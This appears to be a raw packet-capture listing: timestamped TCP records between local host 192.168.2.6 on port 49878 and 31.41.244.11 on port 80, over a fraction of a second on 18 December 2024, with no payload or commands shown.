                                                                                                                                                              Dec 18, 2024 11:47:46.975513935 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.975588083 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.975625992 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.976624012 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.976661921 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.976752043 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.976852894 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.977791071 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.977835894 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.977996111 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.978035927 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.978988886 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.979011059 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.979033947 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.979048967 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.980178118 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.980221033 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.980376959 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.980415106 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.981517076 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.981547117 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.981559038 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.981581926 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.982470989 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.982608080 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.982630968 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.982644081 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.983793020 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.983841896 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.983841896 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.983887911 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.984833002 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.984874964 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.984899044 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.984937906 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.985987902 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.986032963 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.986042976 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.986082077 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.987163067 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.987204075 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.987273932 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.987320900 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.988312006 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.988356113 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.988392115 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.988431931 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.989521027 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.989579916 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.989600897 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.989612103 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.990632057 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.990675926 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.990730047 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.990773916 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.991879940 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.991925955 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.992022991 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.992064953 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.992974043 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.993014097 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.993042946 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.993083000 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.994189024 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.994230032 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.994288921 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.994334936 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.995337009 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.995373011 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.995438099 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.995477915 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.996499062 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.996542931 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.996575117 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.996613979 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.997754097 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.997790098 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.997796059 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.997824907 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.998830080 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.998893976 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.998955965 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.998997927 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.999994993 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.000040054 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.000125885 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.000164986 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.001168966 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.001209021 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.001337051 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.001374960 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.002357960 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.002399921 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.002454996 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.002526045 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.003493071 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.003535032 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.003572941 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.003613949 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.004755974 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.004798889 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.004801035 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.004836082 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.005954027 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.005997896 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.006031036 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.006066084 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.006959915 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.007003069 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.007106066 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.007144928 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.138036966 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.138144970 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.138160944 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.138202906 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.138418913 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.138464928 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.138519049 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.138559103 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.139662981 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.139705896 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.139786005 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.139826059 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.140897989 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.140934944 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.141179085 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.141222954 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.141252041 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.141299963 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.142328978 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.142366886 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.142395973 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.142436028 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.143487930 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.143529892 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.143618107 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.143657923 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.144650936 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.144690990 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.144757986 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.144802094 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.145926952 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.145966053 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.146024942 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.146065950 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.146998882 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.147046089 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.147113085 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.147152901 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.148303986 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.148345947 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.148381948 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.148428917 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.149384022 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.149432898 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.149466991 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.149555922 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.150640011 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.150682926 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.150757074 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.150794983 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.152122021 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.152164936 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.152199984 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.152244091 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.153198957 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.153240919 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.153259039 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.153322935 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.154126883 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.154175043 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.154175997 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.154227972 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.155180931 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.155229092 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.155338049 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.155383110 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.156395912 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.156435013 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.156482935 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.156522989 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.157511950 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.157552958 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.157697916 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.157741070 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.158643007 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.158684969 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.158745050 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.158782959 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.159944057 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.159982920 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.160034895 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.160068989 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.161051035 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.161092997 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.161144972 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.161183119 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.162201881 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.162245035 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.162323952 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.162364960 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.163398027 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.163436890 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.163500071 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.163538933 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.164518118 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.164558887 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.164627075 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.164669037 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.165673018 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.165714025 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.165744066 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.165785074 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.166893005 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.166939020 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.166990042 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.167028904 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.168028116 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.168071032 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.168137074 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.168175936 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.169183969 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.169226885 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.169297934 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.169334888 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.170366049 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.170408964 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.170427084 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.170464993 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.171540022 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.171583891 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.171652079 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.171693087 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.172722101 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.172770977 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.172801018 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.172837973 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.173901081 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.173940897 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.173990965 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.174029112 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.175070047 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.175113916 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.175149918 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.175189018 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.176224947 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.176265001 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.176316977 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.176356077 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.177390099 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.177427053 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.177521944 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.177562952 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.178545952 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.178586960 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.178642035 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.178680897 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.179722071 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.179763079 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.179820061 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.179857016 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.181013107 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.181054115 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.181171894 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.181210995 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.182075024 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.182116985 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.182179928 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.182219982 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.183235884 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.183280945 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.183356047 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.183396101 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.184524059 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.184566975 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.184884071 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.184922934 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.186009884 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.186034918 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.186053991 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.186067104 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.186986923 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.187027931 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.187136889 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.187175989 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.187952042 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.187989950 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.188061953 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.188100100 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.189127922 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.189179897 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.189271927 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.189310074 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.190227032 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.190267086 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.190320969 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.190363884 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.191482067 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.191524029 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.191550016 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.191590071 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.192598104 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.192637920 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.192707062 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.192756891 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.193736076 CET804987831.41.244.11192.168.2.6
